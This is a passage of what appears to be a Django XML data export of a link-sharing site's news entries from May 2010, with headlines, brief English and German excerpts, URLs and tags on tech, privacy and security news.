&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.csmonitor.com/Science/2010/0509/Zombie-satellite-runs-amok-in-Earth-s-orbit</field><field type="FileField" name="page_screenshot">page_shots/2010/05/11/zombie-satellite-runs-amok-in-earths-or.png</field><field type="SlugField" name="slug">zombie-satellite-runs-amok-in-earths-or</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-11 10:33:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">zombiesat</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="148" model="submitter.newsentry"><field type="CharField" name="title">7Gbps WiFi Wireless Networking Hardware Could Launch in 2010 &amp;minus; ISPreview UK</field><field type="TextField" name="excerpt">@ 60GHz </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;@ 60GHz
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.ispreview.co.uk/story/2010/05/10/7gbps-wifi-wireless-networking-hardware-could-launch-in-2010.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/11/7gbps-wifi-wireless-networking-hardware-could-laun.png</field><field type="SlugField" name="slug">7gbps-wifi-wireless-networking-hardware-could-laun</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-11 10:30:20</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">wlan</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="147" model="submitter.newsentry"><field type="CharField" name="title">Twitter confirms awkward 'auto-follow' bug | The Social - CNET News</field><field type="TextField" name="excerpt">It's been a Monday of social-media security embarrassments: Twitter has confirmed the existence of a bug that can force one user to follow another.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;It's been a Monday of social-media security embarrassments: Twitter has confirmed the existence of a bug that can force one user to follow another.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://news.cnet.com/8301-13577_3-20004563-36.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/11/twitter-confirms-awkward-auto-follow-bug-the-s.png</field><field type="SlugField" name="slug">twitter-confirms-awkward-auto-follow-bug-the-s</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-11 10:27:56</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">twitter</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="146" model="submitter.newsentry"><field type="CharField" name="title">heise online - Fremde MobileMails bei Vodafone einsehbar</field><field type="TextField" name="excerpt">Vodafone läßt Mobilnutzer mal in die Mailbox anderer Kunden gucken.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Vodafone läßt Mobilnutzer mal in die Mailbox anderer Kunden gucken.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Fremde-MobileMails-bei-Vodafone-einsehbar-995531.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/11/heise-online-fremde-mobilemails-bei-vodafone-ein.png</field><field type="SlugField" name="slug">heise-online-fremde-mobilemails-bei-vodafone-ein</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-11 10:22:45</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">dataloss vodafone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="145" model="submitter.newsentry"><field type="CharField" name="title">heise online - Hohes Bußgeld gegen Postbank in Finanzberater-Affäre</field><field type="TextField" name="excerpt">120k € für "Postbank gibt Kontobewegungen an Vermarkter" raus.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;120k € für "Postbank gibt Kontobewegungen an Vermarkter" raus.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Hohes-Bussgeld-gegen-Postbank-in-Finanzberater-Affaere-996142.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/11/heise-online-hohes-bugeld-gegen-postbank-in-fin.png</field><field type="SlugField" name="slug">heise-online-hohes-bugeld-gegen-postbank-in-fin</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-11 10:21:03</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">dataloss postbank</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="144" model="submitter.newsentry"><field type="CharField" name="title">WordPress Hacked with Zettapetta on DreamHost | WPSecurityLock</field><field type="TextField" name="excerpt">Wordpress and potential other php applications mass hack. Malware distributed</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Wordpress and potential other php applications mass hack. Malware distributed
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/11/no_page_shot.png</field><field type="SlugField" name="slug">wordpress-hacked-with-zettapetta-on-dreamhost-wp</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-11 10:18:45</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">hack php wordpress</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="143" model="submitter.newsentry"><field type="CharField" name="title">heise online - US-Präsident sieht iPad, Xbox und PlayStation skeptisch</field><field type="TextField" name="excerpt">Reden kann er schön, der Friedensnobelpreisträger:
Der Wandel lasse sich nicht aufhalten, aber er lasse sich mit Hilfe von Bildung kanalisieren, gestalten, und man könne sich ihm anpassen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Reden kann er schön, der Friedensnobelpreisträger:
&lt;/p&gt;
&lt;p&gt;Der Wandel lasse sich nicht aufhalten, aber er lasse sich mit Hilfe von Bildung kanalisieren, gestalten, und man könne sich ihm anpassen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/US-Praesident-sieht-iPad-Xbox-und-PlayStation-skeptisch-996678.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/11/heise-online-us-prasident-sieht-ipad-xbox-und-p.png</field><field type="SlugField" name="slug">heise-online-us-prasident-sieht-ipad-xbox-und-p</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-11 10:11:18</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">obama</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="142" model="submitter.newsentry"><field type="CharField" name="title">heise online - Facebook verstärkt Lobby-Truppe</field><field type="TextField" name="excerpt">What to do if you are attacked by politics for data collecting? Invest more in lobbying.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;What to do if you are attacked by politics for data collecting? Invest more in lobbying.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Facebook-verstaerkt-Lobby-Truppe-996867.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/11/heise-online-facebook-verstarkt-lobby-truppe.png</field><field type="SlugField" name="slug">heise-online-facebook-verstarkt-lobby-truppe</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-11 10:08:22</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">facebook lobby</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="141" model="submitter.newsentry"><field type="CharField" name="title">miculog Bündnis 90/Die Grünen in Sachsen fordern einen Umstieg auf GNU/Linux und freie Software — Auswertung der großen FLOSS-Anfrage</field><field type="TextField" name="excerpt">Die Fraktion von Bündnis 90/Die Grünen im sächsischen Landtag hatte eine große Anfrage zum Einsatz von freier Software in öffentlichen Stellen und Schulen in Sachsen gestellt. Dazu gab es heute eine Pressekonferenz und eine Pressemitteilung, in der sie ihre Auswertung der Antwort auf die Anfrage präsentiert haben. Die gewonnenen Erkenntnisse finde ich durchaus nicht uninteressant. Zum Beispiel hat die große Anfrage ergeben, dass nur 1,7% der Softwarelizenzen in Sachsen FOSS-Lizenzen sind. Ausgerechnet im Serverbereich, in dem freie Betriebssysteme wie GNU/Linux und die BSD-Derivate besonders etabliert sind und in dem ein Umstieg außerdem besonders einfach zu bewerkstelligen wäre, beträgt der Anteil an Freien-Software-Lizenzen nur 0,8%. Zudem fallen dort für nur 16% der im öffentlichen Sektor Sachsens eingesetzten Lizenzen 58% der gesamten Lizenzgebühren an. Insgesamt gibt Sachsen jährlich 9,3 Mio. Euro nur für die Lizenzierung proprietärer Softwareprodukte aus.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die Fraktion von Bündnis 90/Die Grünen im sächsischen Landtag hatte eine große Anfrage zum Einsatz von freier Software in öffentlichen Stellen und Schulen in Sachsen gestellt. Dazu gab es heute eine Pressekonferenz und eine Pressemitteilung, in der sie ihre Auswertung der Antwort auf die Anfrage präsentiert haben. Die gewonnenen Erkenntnisse finde ich durchaus nicht uninteressant. Zum Beispiel hat die große Anfrage ergeben, dass nur 1,7% der Softwarelizenzen in Sachsen FOSS-Lizenzen sind. Ausgerechnet im Serverbereich, in dem freie Betriebssysteme wie GNU/Linux und die BSD-Derivate besonders etabliert sind und in dem ein Umstieg außerdem besonders einfach zu bewerkstelligen wäre, beträgt der Anteil an Freien-Software-Lizenzen nur 0,8%. Zudem fallen dort für nur 16% der im öffentlichen Sektor Sachsens eingesetzten Lizenzen 58% der gesamten Lizenzgebühren an. Insgesamt gibt Sachsen jährlich 9,3 Mio. Euro nur für die Lizenzierung proprietärer Softwareprodukte aus.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://micuintus.de/2010/05/07/bundnis-90die-grunen-in-sachsen-fordern-einen-umstieg-auf-gnulinux-und-freie-software-%E2%80%94-auswertung-der-grosen-floss-anfrage/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/11/miculog-bundnis-90die-grunen-in-sachsen-fordern-e.png</field><field type="SlugField" name="slug">miculog-bundnis-90die-grunen-in-sachsen-fordern-e</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-11 09:52:31</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">foss saxony</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="139" model="submitter.newsentry"><field type="CharField" name="title">SUP MUA</field><field type="TextField" name="excerpt">Zwischending zw. Google Mail und mutt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Zwischending zw. Google Mail und mutt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://sup.rubyforge.org/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/09/sup-mua.png</field><field type="SlugField" name="slug">sup-mua</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-09 23:53:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">mua</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="2"></object></field></object><object pk="138" model="submitter.newsentry"><field type="CharField" name="title">Chinese Rules Said to Threaten Proprietary Information - NYTimes.com</field><field type="TextField" name="excerpt">Chinese Government Requires Disclosure of Encryption Keys Prior to Product Purchase
As of May 1, vendors of certain products who wish to continue doing business with government agencies in China are required to disclose specifics of the encryption technologies their products use. The requirements affect 13 technologies, including firewalls, routers, smartcards, database security tools, anti-spam products and intrusion detection products. Before these products can be sold to the Chinese
government, they must be tested and certified by the country's Certification and Accreditation Administration (CNCA). There are concerns that the requirement would allow proprietary information to be
leaked to Chinese competitors and that other countries may be wary of doing business with companies that disclose this sort of information to the Chinese government.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Chinese Government Requires Disclosure of Encryption Keys Prior to Product Purchase
&lt;/p&gt;
&lt;p&gt;As of May 1, vendors of certain products who wish to continue doing business with government agencies in China are required to disclose specifics of the encryption technologies their products use. The requirements affect 13 technologies, including firewalls, routers, smartcards, database security tools, anti-spam products and intrusion detection products. Before these products can be sold to the Chinese
government, they must be tested and certified by the country's Certification and Accreditation Administration (CNCA). There are concerns that the requirement would allow proprietary information to be
leaked to Chinese competitors and that other countries may be wary of doing business with companies that disclose this sort of information to the Chinese government.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.nytimes.com/2010/05/01/business/global/01yuan.html?src=busln</field><field type="FileField" name="page_screenshot">page_shots/2010/05/09/chinese-rules-said-to-threaten-proprietary-informa.png</field><field type="SlugField" name="slug">chinese-rules-said-to-threaten-proprietary-informa</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-09 23:48:22</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">china keyescrow</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="137" model="submitter.newsentry"><field type="CharField" name="title">Hacked US Treasury websites serve visitors malware • The Register</field><field type="TextField" name="excerpt">Websites operated by the US Treasury Department are redirecting visitors to websites that attempt to install malware on their PCs
Siehe auch [Trojaner vom Umweltbundesamt](http://pentamedia.c3d2.de/submit/2010/03/31/heise-online-webseite-des-umweltbundesamtes-vert/)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Websites operated by the US Treasury Department are redirecting visitors to websites that attempt to install malware on their PCs
Siehe auch &lt;a href="http://pentamedia.c3d2.de/submit/2010/03/31/heise-online-webseite-des-umweltbundesamtes-vert/"&gt;Trojaner vom Umweltbundesamt&lt;/a&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/05/03/treasury_websites_attack/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/09/hacked-us-treasury-websites-serve-visitors-malware.png</field><field type="SlugField" name="slug">hacked-us-treasury-websites-serve-visitors-malware</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-09 23:45:11</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">malware</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="136" model="submitter.newsentry"><field type="CharField" name="title">Facebook closes serious security hole - The H Security: News and Features</field><field type="TextField" name="excerpt">FB let's other users read chat logs. Reference to [Hacker jagen statt Lecks fixen](http://pentamedia.c3d2.de/submit/2010/04/15/heise-online-facebook-lieber-angreifer-jagen-al/).</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;FB let's other users read chat logs. Reference to &lt;a href="http://pentamedia.c3d2.de/submit/2010/04/15/heise-online-facebook-lieber-angreifer-jagen-al/"&gt;Hacker jagen statt Lecks fixen&lt;/a&gt;.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.h-online.com/security/news/item/Facebook-closes-serious-security-hole-994419.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/09/facebook-closes-serious-security-hole-the-h-secu.png</field><field type="SlugField" name="slug">facebook-closes-serious-security-hole-the-h-secu</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-09 23:38:31</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">facebook</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="135" model="submitter.newsentry"><field type="CharField" name="title">Love Bug 10 years later: I love you - now open this email - Security</field><field type="TextField" name="excerpt">10 Jahre und kein Stück klüger: at the time the ILOVEYOU Worm, or Love Bug, had infected 45 million computers. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;10 Jahre und kein Stück klüger: at the time the ILOVEYOU Worm, or Love Bug, had infected 45 million computers.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.thetechherald.com/article.php/201018/5596/Love-Bug-10-years-later-I-love-you-now-open-this-email</field><field type="FileField" name="page_screenshot">page_shots/2010/05/09/love-bug-10-years-later-i-love-you-now-open-thi.png</field><field type="SlugField" name="slug">love-bug-10-years-later-i-love-you-now-open-thi</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-09 23:26:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">antivirus</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="134" model="submitter.newsentry"><field type="CharField" name="title">New attack bypasses virtually all AV protection • The Register</field><field type="TextField" name="excerpt">Researchers say they've devised a way to bypass protections built in to dozens of the most popular desktop anti-virus products, including those offered by McAfee, Trend Micro, AVG, and BitDefender.
The method, developed by software security researchers at matousec.com, works by exploiting the driver hooks the anti-virus programs bury deep inside the Windows operating system. In essence, it works by sending them a sample of benign code that passes their security checks and then, before it's executed, swaps it out with a malicious payload.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Researchers say they've devised a way to bypass protections built in to dozens of the most popular desktop anti-virus products, including those offered by McAfee, Trend Micro, AVG, and BitDefender.
&lt;/p&gt;
&lt;p&gt;The method, developed by software security researchers at matousec.com, works by exploiting the driver hooks the anti-virus programs bury deep inside the Windows operating system. In essence, it works by sending them a sample of benign code that passes their security checks and then, before it's executed, swaps it out with a malicious payload.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/05/07/argument_switch_av_bypass/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/09/new-attack-bypasses-virtually-all-av-protection.png</field><field type="SlugField" name="slug">new-attack-bypasses-virtually-all-av-protection</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-09 23:23:38</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">antivirus</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="5"></object></field></object><object pk="133" model="submitter.newsentry"><field type="CharField" name="title">Rudd retreats on web filter legislation | The Australian</field><field type="TextField" name="excerpt">Inet Zensur in Australien ausgesetzt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Inet Zensur in Australien ausgesetzt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theaustralian.com.au/australian-it/rudd-retreats-on-passing-web-filter-legislation/story-e6frgakx-1225859630452</field><field type="FileField" name="page_screenshot">page_shots/2010/05/08/rudd-retreats-on-web-filter-legislation-the-aus.png</field><field type="SlugField" name="slug">rudd-retreats-on-web-filter-legislation-the-aus</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-08 12:46:31</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">censorship</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="132" model="submitter.newsentry"><field type="CharField" name="title">FCC gives Hollywood control over your home theater</field><field type="TextField" name="excerpt">FCC controls your tv output</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;FCC controls your tv output
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/telecom/news/2010/05/fcc-gives-hollywood-control-over-your-home-theater.ars?utm_source=microblogging&amp;utm_medium=arstch&amp;utm_term=Main%20Account&amp;utm_campaign=microblogging</field><field type="FileField" name="page_screenshot">page_shots/2010/05/08/fcc-gives-hollywood-control-over-your-home-theater_.png</field><field type="SlugField" name="slug">fcc-gives-hollywood-control-over-your-home-theater</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-08 08:53:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">soc</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="131" model="submitter.newsentry"><field type="CharField" name="title">Vorratsdatenspeicherung: Kein Einfluss auf die Aufklärungsrate von Verbrechen - Golem.de</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.golem.de/1005/75002.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/08/vorratsdatenspeicherung-kein-einfluss-auf-die-auf_.png</field><field type="SlugField" name="slug">vorratsdatenspeicherung-kein-einfluss-auf-die-auf</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-08 08:44:40</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">vds</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="130" model="submitter.newsentry"><field type="CharField" name="title">Naked scanner reveals airport screener's tiny penis, sparks fist-fight with fellow officers</field><field type="TextField" name="excerpt">Miami airport screeners made fun of one of their own after seeing his small penis on their imaging scan. It ended up with small penis beating someone else with a steel baton.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Miami airport screeners made fun of one of their own after seeing his small penis on their imaging scan. It ended up with small penis beating someone else with a steel baton.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.miamiherald.com/2010/05/06/1616739/cops-airport-screeners-quarrel.html#ixzz0nCeYw0ck</field><field type="FileField" name="page_screenshot">page_shots/2010/05/07/naked-scanner-reveals-airport-screeners-tiny-peni.png</field><field type="SlugField" name="slug">naked-scanner-reveals-airport-screeners-tiny-peni</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-07 11:08:55</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">airport body scanner security theater</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="129" model="submitter.newsentry"><field type="CharField" name="title">Wir in NRW Das Blog</field><field type="TextField" name="excerpt">Journalisten und Informanten *anonym* hinter Enthüllungsblog zur Wahl in NRW.
&gt; …für einen kritischen Journalismus im Netz. In Nordrhein-Westfalen. In Zeiten, da die Erträge der Zeitungs- und Zeitschriftenverlage einbrechen, &gt; hunderte von Journalistenstellen in den Redaktionen gestrichen werden, die Politik mit neuen Mediengesetzen in Verlagen, Rundfunk- und &gt; Fernsehsendern immer stärker Einfluss nimmt, ist es notwendig, unabhängig, klar und parteifern das aufzuschreiben, was wirklich passiert.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Journalisten und Informanten &lt;em&gt;anonym&lt;/em&gt; hinter Enthüllungsblog zur Wahl in NRW.
&lt;/p&gt;
&lt;blockquote&gt;&lt;p&gt;…für einen kritischen Journalismus im Netz. In Nordrhein-Westfalen. In Zeiten, da die Erträge der Zeitungs- und Zeitschriftenverlage einbrechen, &amp;gt; hunderte von Journalistenstellen in den Redaktionen gestrichen werden, die Politik mit neuen Mediengesetzen in Verlagen, Rundfunk- und &amp;gt; Fernsehsendern immer stärker Einfluss nimmt, ist es notwendig, unabhängig, klar und parteifern das aufzuschreiben, was wirklich passiert.
&lt;/p&gt;
&lt;/blockquote&gt;</field><field type="CharField" name="external_url">http://www.wir-in-nrw-blog.de/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/06/wir-in-nrw-das-blog.png</field><field type="SlugField" name="slug">wir-in-nrw-das-blog</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-06 18:21:55</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">blog journalism nrw</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="128" model="submitter.newsentry"><field type="CharField" name="title">virtual Desktop Patentklage gegen Red Hat und Novell gescheitert </field><field type="TextField" name="excerpt">Patent Troll bounced w/ *virtual desktop* patent.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Patent Troll bounced w/ &lt;em&gt;virtual desktop&lt;/em&gt; patent.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Patentklage-gegen-Red-Hat-und-Novell-gescheitert-991964.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/05/heise-online-patentklage-gegen-red-hat-und-novel_.png</field><field type="SlugField" name="slug">heise-online-patentklage-gegen-red-hat-und-novel</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-05 16:32:54</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">patent troll</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="127" model="submitter.newsentry"><field type="CharField" name="title"> Neues Datenleck bei SchülerVZ : netzpolitik.org</field><field type="TextField" name="excerpt">SchülerVZ mal wieder gespidert</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;SchülerVZ mal wieder gespidert
